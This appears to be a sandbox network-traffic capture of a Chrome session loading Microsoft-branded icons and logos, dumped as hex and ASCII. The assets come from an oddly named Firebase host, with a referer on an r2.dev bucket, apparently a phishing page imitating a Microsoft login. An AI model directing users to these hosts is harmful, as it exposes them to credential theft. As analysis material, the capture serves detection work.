2024-04-17 23:23:16 UTC	240	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 a2 49 44 41 54 48 89 ed 94 bb 0d c2 40 10 05 c7 08 11 bb 05 3a 20 21 44 e2 25 14 40 25 f4 e2 3e 28 80 e4 05 34 40 46 48 4e 44 07 47 6a 9d 6c d9 27 ed 49 20 f9 85 1b cc 68 3f da 26 a5 44 cd ac aa d2 17 c1 7f 09 24 b5 92 da 52 c1 7a 2e 1c b8 01 1b 60 17 2a e8 c1 b7 c0 b9 04 0e 13 23 ca e1 b6 ef 61 82 08 38 40 33 f4 2a 7a f0 3d f0 04 de 33 58 17 db 8f bc 58 fd 4c 07 3b 80 b8 11 8d 76 60 fb 03 9c 80 17 70 95 74 08 15 44 49 26 77 90 49 ba 70 41 26 39 96 0a 46 97 1c 95 df f9 a6 8b a0 5a be 46 47 3c 26 c0 3a 39 11 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRw=pHYs~IDATH@: !D%@%>(4@FHNDGjl'I h?&D$Rz.`#a8@3z=3XXL;v`ptDI&wIpA&9FZFG<&:9IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	418	OUT	GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:16 UTC	594	IN	HTTP/1.1 200 OK Connection: close Content-Length: 915 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "cf034e803491c0dbb1074332cd18fac418b94b0a139a7ddbf92ec40574951a8a" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:16 GMT X-Served-By: cache-pdk-kfty2130074-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713396196.024523,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:16 UTC	915	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 37 37 37 37 37 22 20 64 3d 22 4d 31 2e 31 34 33 2c 36 2e 38 35 37 61 31 2e 31 30 37 2c 31 2e 31 30 37 2c 30 2c 30 2c 31 2c 2e 34 34 36 2e 30 38 39 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2c 2e 36 30 37 2e 36 30 37 2c 31 2e 31 36 31 2c 31 2e 31 36 31 2c 30 2c 30 2c 31 2c 30 2c 2e 38 39 33 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2d 2e 36 30 37 2e 36 30 37 2c 31 2e 31 30 37 2c 31 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	419	OUT	GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:16 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3651 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "2084deafc36fbaca40a6352319b3c1edb1262245428033547de6b82e0c2dcfe8" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:16 GMT X-Served-By: cache-pdk-kfty2130079-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713396196.029282,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:16 UTC	1378	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0
2024-04-17 23:23:16 UTC	1378	IN	Data Raw: 30 2c 30 2c 31 2d 33 2e 36 35 32 2d 31 2e 33 35 32 41 34 2e 39 38 37 2c 34 2e 39 38 37 2c 30 2c 30 2c 31 2c 36 36 2e 34 30 36 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 35 2c 33 2e 35 33 35 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 35 2c 32 2e 35 30 35 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31 2c 33 2e 36 35 31 2c 30 2c 30 2c 30 2d 2e 36 38 38 2d 32 2e 34 31 31 2c 32 2e 33 38 39 2c 32 2e 33 38 39 2c 30 2c 30 2c 30 2d 31 2e 39 32 39 2d 2e 38 31 33 2c 32 2e 34 34 2c 32 2e 34 34 2c 30 2c 30 2c 30 2d 31 2e 39 38 38 2e 38 35 32 Data Ascii: 0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852
2024-04-17 23:23:16 UTC	895	IN	Data Raw: 39 2c 30 2c 30 2c 30 2d 31 2e 39 38 37 2e 38 35 32 2c 33 2e 37 30 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 35 2e 34 36 34 2d 33 2e 31 30 39 48 39 39 2e 37 56 31 38 2e 34 48 39 37 2e 33 34 31 56 31 30 2e 34 31 32 48 39 35 2e 36 38 36 56 38 2e 35 30 37 68 31 2e 36 35 35 56 37 2e 31 33 61 33 2e 34 32 33 2c 33 2e 34 32 33 2c 30 2c 30 2c 31 2c 31 2e 30 31 35 2d 32 2e 35 35 35 2c 33 2e 35 36 31 2c 33 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 2d 31 2c 35 2e 38 30 37 2c 35 2e 38 30 37 2c 30 2c 30 2c 31 2c 2e 37 35 31 2e 30 34 33 2c 32 2e 39 39 33 2c 32 2e 39 39 33 2c 30 2c 30 2c 31 2c 2e 35 37 37 2e 31 33 56 35 2e 37 36 34 61 32 2e 34 32 32 2c 32 2e 34 32 32 2c 30 2c 30 2c 30 2d 2e 34 2d 2e 31 36 34 2c 32 2e 31 30 37 2c 32 2e 31 Data Ascii: 9,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	13.107.213.40	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:16 UTC	680	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:16 UTC	805	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 23:23:16 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT ETag: 0x8D7B0071D86E386 x-ms-request-id: e6339bee-b01e-000d-5650-903a85000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240417T232316Z-r1f585c6b65cj2xr4gnuc7ceng000000068g0000000086f3 x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-17 23:23:16 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:17 UTC	642	OUT	GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:18 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17174 Cache-Control: max-age=3600 Content-Type: image/x-icon Etag: "928026765089cd2a4183510ed4f8be0259cd85b776338ee2c337cacc18bdf016" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:17 GMT X-Served-By: cache-pdk-kfty2130034-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713396198.968671,VS0,VE2 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: 3333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 3333333333333333333
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 Data Ascii: DDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDD
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 Data Ascii: UUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUU
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 Data Ascii: DDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 Data Ascii:
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""
2024-04-17 23:23:18 UTC	1378	IN	Data Raw: 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 Data Ascii: UDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	23.201.212.130	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:18 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
